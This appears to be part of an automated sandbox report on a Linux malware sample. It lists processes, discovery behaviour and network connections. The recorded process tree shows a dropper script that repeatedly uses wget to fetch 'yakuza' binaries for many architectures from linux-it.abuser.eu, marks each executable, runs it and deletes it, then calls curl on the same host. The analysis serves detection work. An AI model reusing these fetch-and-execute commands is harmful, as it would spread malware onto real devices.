N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mips N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /bin/rm N/A

Processes

/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/rm

[rm -rf yakuza.mipsel]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/chmod

[chmod +x yakuza.arm6]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/chmod

[chmod +x yakuza.arm4]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/rm

[rm -rf yakuza.sparc]

/bin/bash

[bash]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 151.101.1.91:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
GB 89.187.167.9:443 tcp

Files

N/A